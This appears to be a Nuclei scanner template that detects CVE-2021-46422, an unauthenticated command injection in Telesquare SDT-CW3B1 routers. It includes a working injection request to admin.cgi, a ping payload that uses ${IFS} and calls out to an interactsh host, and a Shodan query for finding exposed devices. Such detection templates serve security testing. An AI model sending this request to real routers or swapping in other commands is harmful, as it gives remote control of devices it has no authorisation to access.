54 lines
2.0 KiB
YAML
54 lines
2.0 KiB
YAML
id: CVE-2021-46422
|
|
|
|
info:
|
|
name: SDT-CW3B1 1.1.0 - OS Command Injection
|
|
author: badboycxcc,prajiteshsingh
|
|
severity: critical
|
|
description: |
|
|
Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication.
|
|
impact: |
|
|
Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the target system.
|
|
remediation: |
|
|
Upgrade to a patched version of SDT-CW3B1 or apply the vendor-supplied patch to mitigate this vulnerability.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/50936
|
|
- https://drive.google.com/drive/folders/1YJlVlb4SlTEGONzIjiMwd2P7ucP_Pm7T?
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-46422
|
|
- https://drive.google.com/drive/folders/1YJlVlb4SlTEGONzIjiMwd2P7ucP_Pm7T?usp=sharing
|
|
- http://packetstormsecurity.com/files/167201/SDT-CW3B1-1.1.0-Command-Injection.html
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2021-46422
|
|
cwe-id: CWE-78
|
|
epss-score: 0.94969
|
|
epss-percentile: 0.99104
|
|
cpe: cpe:2.3:o:telesquare:sdt-cs3b1_firmware:1.1.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: telesquare
|
|
product: sdt-cs3b1_firmware
|
|
shodan-query: html:"SDT-CW3B1"
|
|
tags: packetstorm,cve,cve2021,telesquare,rce,router,injection,edb
|
|
variables:
|
|
cmd: "ping${IFS}-c${IFS}1${IFS}{{interactsh-url}}"
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/cgi-bin/admin.cgi?Command=sysCommand&Cmd={{cmd}}"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "<CmdResult>"
|
|
|
|
- type: word
|
|
name: http
|
|
part: interactsh_protocol
|
|
words:
|
|
- "dns"
|
|
# digest: 490a00463044022069c7d6c0340a62265d6fbd956955d1869969c9959a3b1d65a2328d99eef76a4702202c8aecb66c7ca868436210f59d65f65f516a75dec189386ca953f4b476503db4:922c64590222798bb761d5b6d8e72950 |